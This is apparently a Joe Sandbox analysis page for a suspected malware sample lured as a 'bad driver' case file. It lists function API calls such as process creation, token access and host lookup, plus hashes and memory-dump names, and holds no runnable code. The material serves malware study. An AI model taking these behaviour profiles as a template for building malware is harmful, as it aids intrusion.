Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: bc2c169fd04ff2c4b4fccf61ce69429a6a38b75632f4c346cfcb677cf8f81ba1
Instruction ID: 255f37e4aa06668e6657ec9ae71d3f95929aa4d81de0b778c87b9474940d36ca
Opcode Fuzzy Hash: bc2c169fd04ff2c4b4fccf61ce69429a6a38b75632f4c346cfcb677cf8f81ba1
Instruction Fuzzy Hash: 19112732404A05AFCB302F71AC4175D77D9AF103E5F2004BFF946962A1EF7089418794

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BB4560

Part of subcall function 00BB410D: _memset.LIBCMT ref: 00BB418D
Part of subcall function 00BB410D: _wcscpy.LIBCMT ref: 00BB41E1
Part of subcall function 00BB410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BB41F1

KillTimer.USER32(?,00000001,?,?), ref: 00BB45B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BB45C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BED6CE

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 5c4f8443bd968ba79c7958bec611f6ef6510930805da53730a13e30ed04296a4
Instruction ID: 182ba4088e2ad8e8c14e2db22b3ae850d08f4dd0e117909f76f24bd41b003c52
Opcode Fuzzy Hash: 5c4f8443bd968ba79c7958bec611f6ef6510930805da53730a13e30ed04296a4
Instruction Fuzzy Hash: B021A770904784AFEB328B25D895BFBBBECEF11304F0404DEE69E56242C7F45A859B51

Uniqueness

Uniqueness Score: -1.00%

Function 00C2667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C17B20,?,?,00000000), ref: 00BB5B8C
Part of subcall function 00BB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C17B20,?,?,00000000,?,?), ref: 00BB5BB0

gethostbyname.WSOCK32(?,?,?), ref: 00C266AC
WSAGetLastError.WSOCK32(00000000), ref: 00C266B7
_memmove.LIBCMT ref: 00C266E4
inet_ntoa.WSOCK32(?), ref: 00C266EF

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 0618b446bc9f6b623356f813febed701a28567177b45e362e12abb20e03d136e
Instruction ID: ec00f69adb154f489f5f2c25eedd3fc421da945b27c179de0c69e0496f4ca5cc
Opcode Fuzzy Hash: 0618b446bc9f6b623356f813febed701a28567177b45e362e12abb20e03d136e
Instruction Fuzzy Hash: 65112135900505AFCB14FFA4DD86EEEB7B8AF04310B1444A9F506A71A1DF709E14DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C09023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C09043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C09055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C0906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C09086

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6bfae5fe397294e65815cbfb4e621fbc1c7a8e786e9e6b17bc7d7a60111fc4ac
Instruction ID: 11f3622a8dcaa5bdcceb9e6984819b4b3fe9fb6f4417850992bf9aaae2039471
Opcode Fuzzy Hash: 6bfae5fe397294e65815cbfb4e621fbc1c7a8e786e9e6b17bc7d7a60111fc4ac
Instruction Fuzzy Hash: C2113A79900218BFDB10DFA5C985F9DBB74FB48310F204095E914B7290D6716E10DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00BB2612: GetWindowLongW.USER32(?,000000EB), ref: 00BB2623

DefDlgProcW.USER32(?,00000020,?), ref: 00BB12D8
GetClientRect.USER32(?,?), ref: 00BEB84B
GetCursorPos.USER32(?), ref: 00BEB855
ScreenToClient.USER32(?,?), ref: 00BEB860

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 0c4b85a524ca67ed8df318960db53e37b5f452f1ca70e195a8749f3d8f08b174
Instruction ID: eac6160ebe987a391e28d0ef518a27e4abd2a387d085ae71453cfc0969e70268
Opcode Fuzzy Hash: 0c4b85a524ca67ed8df318960db53e37b5f452f1ca70e195a8749f3d8f08b174
Instruction Fuzzy Hash: BC114C35A10019AFCB04DFA8D895EFE77F8FB05301F500896F911E7250C7B0BA528BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C11652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C101FD,?,00C11250,?,00008000), ref: 00C1166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C101FD,?,00C11250,?,00008000), ref: 00C11694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C101FD,?,00C11250,?,00008000), ref: 00C1169E
Sleep.KERNEL32(?,?,?,?,?,?,?,00C101FD,?,00C11250,?,00008000), ref: 00C116D1

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 5420ce27785ccd433b5cabd4cae8554c1cc26c571f43b51431c13fb5b69f2e2a
Instruction ID: 20dc72b2ad0e9d9926f62207a132ac05b4f782af4418ea53ff1a46b79911df96
Opcode Fuzzy Hash: 5420ce27785ccd433b5cabd4cae8554c1cc26c571f43b51431c13fb5b69f2e2a
Instruction Fuzzy Hash: 2F117C31C1051CDBCF009FA6E849BEEBB78FF0A741F084459EE80B6240CB355AA19B96

Uniqueness

Uniqueness Score: -1.00%

Function 00BE7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00BE722B

Part of subcall function 00BE7912: __fltout2.LIBCMT ref: 00BE793B

__cftog_l.LIBCMT ref: 00BE7251
__cftoe_l.LIBCMT ref: 00BE7283

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: f568f07f16e4d008e7072787d6ea3ed8c10b22b5c39f1e62d76870f3ec4f6882
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 6201803608418ABBCF125E85DC41CEE3FA2FF1A341B088695FB1858031CB37C9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C3B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C3B59E
ScreenToClient.USER32(?,?), ref: 00C3B5B6
ScreenToClient.USER32(?,?), ref: 00C3B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C3B5F5

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: e6cf0988f2e5bf17e06f5fc5494db23b65660f3545ebaf12c2ee6606071963bc
Instruction ID: bb8f7a340a94900f84b6e3478e7fe7022196c80d5215f763f486c632daa5a372
Opcode Fuzzy Hash: e6cf0988f2e5bf17e06f5fc5494db23b65660f3545ebaf12c2ee6606071963bc
Instruction Fuzzy Hash: 991146B5D10209EFDB41CF99C445AEEFBB5FB08310F104166E914E3220D735AA558F50

Uniqueness

Uniqueness Score: -1.00%

Function 00C3B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C3B8FE
_memset.LIBCMT ref: 00C3B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C77F20,00C77F64), ref: 00C3B93C
CloseHandle.KERNEL32 ref: 00C3B94E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: badccf93e8b883e731f740147b8a141f578efcfa4c76fec052c9e5d850d85c6e
Instruction ID: 46e0813fa9e8694227effa69d8b5dc8439a797f5e568a52fcc5670d48ff20297
Opcode Fuzzy Hash: badccf93e8b883e731f740147b8a141f578efcfa4c76fec052c9e5d850d85c6e
Instruction Fuzzy Hash: C8F058F2654308BBE7102BA1AD46FBF7A9CEB08754F008561FB0CD62A2E7714D1187A9

Uniqueness

Uniqueness Score: -1.00%

Function 00C16E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00C16E88

Part of subcall function 00C1794E: _memset.LIBCMT ref: 00C17983

_memmove.LIBCMT ref: 00C16EAB
_memset.LIBCMT ref: 00C16EB8
LeaveCriticalSection.KERNEL32(?), ref: 00C16EC8

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 0b053da5fef68e0cffb53d121814ff07eefda2c81659c5fa4a41a5ecf4c00c36
Instruction ID: 277c162c1d1d224f1caa2e33f0a89ad70d28717b3e264472d8c769b28ea7b821
Opcode Fuzzy Hash: 0b053da5fef68e0cffb53d121814ff07eefda2c81659c5fa4a41a5ecf4c00c36
Instruction Fuzzy Hash: CBF0303A504200ABCF016F55DC85B8ABB69EF45320F04C065FE085E217C771A951DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00C3C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00BB12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB134D
Part of subcall function 00BB12F3: SelectObject.GDI32(?,00000000), ref: 00BB135C
Part of subcall function 00BB12F3: BeginPath.GDI32(?), ref: 00BB1373
Part of subcall function 00BB12F3: SelectObject.GDI32(?,00000000), ref: 00BB139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C3C030
LineTo.GDI32(00000000,?,?), ref: 00C3C03D
EndPath.GDI32(00000000), ref: 00C3C04D
StrokePath.GDI32(00000000), ref: 00C3C05B

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 9982ca3a8acc7dfe34259614a0bec9b2cffa25230a5b6c1a0c0374b9802ee253
Instruction ID: 09f1f6b3119fc11670828879b36f997ad7f048fff47ad66e012452851be74e0d
Opcode Fuzzy Hash: 9982ca3a8acc7dfe34259614a0bec9b2cffa25230a5b6c1a0c0374b9802ee253
Instruction Fuzzy Hash: C5F0EC32010259FBDB222F58EC0AFCE3F98AF06310F044004FA21210E287B916A2CFE6

Uniqueness

Uniqueness Score: -1.00%

Function 00C0A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C0A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C0A3AC
GetCurrentThreadId.KERNEL32 ref: 00C0A3B3
AttachThreadInput.USER32(00000000), ref: 00C0A3BA

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 654355928c0c07c92257c5d12e7633da678c7de5f0730ca095f41829dc587c82
Instruction ID: 8bd11b66b516e915cd92ade6e2173189dfe324bf1c29bd7088b66ecbefee5490
Opcode Fuzzy Hash: 654355928c0c07c92257c5d12e7633da678c7de5f0730ca095f41829dc587c82
Instruction Fuzzy Hash: A7E0A531945328BADB205BA2DC0DFDB7E6CEF267A1F008429F509950B0C671C541DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00BB2231
SetTextColor.GDI32(?,000000FF), ref: 00BB223B
SetBkMode.GDI32(?,00000001), ref: 00BB2250
GetStockObject.GDI32(00000005), ref: 00BB2258
GetWindowDC.USER32(?,00000000), ref: 00BEC0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 00BEC0E0
GetPixel.GDI32(00000000,?,00000000), ref: 00BEC0F9
GetPixel.GDI32(00000000,00000000,?), ref: 00BEC112
GetPixel.GDI32(00000000,?,?), ref: 00BEC132
ReleaseDC.USER32(?,00000000), ref: 00BEC13D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: acde08ec36d6415c6941553e49f005058d1d10bc551e6db8c6da57390dd9f106
Instruction ID: f5890f0dc930d3738d29e25f35b336489c558bfa9641bac098e8fed89d6db3fd
Opcode Fuzzy Hash: acde08ec36d6415c6941553e49f005058d1d10bc551e6db8c6da57390dd9f106
Instruction Fuzzy Hash: 16E03932910284EADB215F64FC09BDC3B60EB05332F0083AAFA69980E1C7B14982DB12

Uniqueness

Uniqueness Score: -1.00%

Function 00C08C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00C08C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,00C0882E), ref: 00C08C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C0882E), ref: 00C08C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,00C0882E), ref: 00C08C7E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: cbd78798c2a1b5fc203dfa94d0f43a8c3859187cd3c7e38ba03daf67b01bf2f6
Instruction ID: bb26d4f6df51641c3047056452d64bbe3e78240a9392804a49c1c55d241cbd5e
Opcode Fuzzy Hash: cbd78798c2a1b5fc203dfa94d0f43a8c3859187cd3c7e38ba03daf67b01bf2f6
Instruction Fuzzy Hash: FFE08636A52221DBE7205FB46E0CB5F3BBCEF50792F048C2DB285C9090DA748446CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BF2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00BF2187
GetDC.USER32(00000000), ref: 00BF2191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BF21B1
ReleaseDC.USER32(?), ref: 00BF21D2

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 48a22619e91d519d528732b8ec9fce949b7fb27a4984a17f904a8a7eeec7ff68
Instruction ID: 687dbf78a1be7d3a6d705154b65ef3c4447beeb9d27c3eef2f479942634711b0
Opcode Fuzzy Hash: 48a22619e91d519d528732b8ec9fce949b7fb27a4984a17f904a8a7eeec7ff68
Instruction Fuzzy Hash: 41E01A75C10608EFDB019FA0C849BADBFF1EF4C350F108829F95AA7220CB7885429F40

Uniqueness

Uniqueness Score: -1.00%

Function 00BF219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00BF219B
GetDC.USER32(00000000), ref: 00BF21A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BF21B1
ReleaseDC.USER32(?), ref: 00BF21D2

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: bd7f04eb0f31a87ebab8b86d76a45466b54de901b6adcecbd21f458d8f727767
Instruction ID: d28a0906a07175df46a409fc8d4057268873bdcb66a7ca83ad616bc5a55e678a
Opcode Fuzzy Hash: bd7f04eb0f31a87ebab8b86d76a45466b54de901b6adcecbd21f458d8f727767
Instruction Fuzzy Hash: E7E012B5C10204AFCB019FB0C809BADBFF1EB4C310F108829F95AA7220CB7895429F40

Uniqueness

Uniqueness Score: -1.00%

Function 00C0B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00C0B981

Strings

AutoIt3GUI, xrefs: 00C0B8F9
Container, xrefs: 00C0B8FE

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 63544fd8c7f96732eb7ad73a3cb1ec681c83ce917d7ca13b6b72be1a1ffd38f2
Instruction ID: 15c460e1b1b1fd8298b6c15cdb94650218fbe3455d7024a08430981f89f39d5f
Opcode Fuzzy Hash: 63544fd8c7f96732eb7ad73a3cb1ec681c83ce917d7ca13b6b72be1a1ffd38f2
Instruction Fuzzy Hash: 2D9139706006019FDB24DF68C885A6ABBF9FF48710F24856EF94ACB6A1DB70ED41CB50

Uniqueness

Uniqueness Score: -1.00%

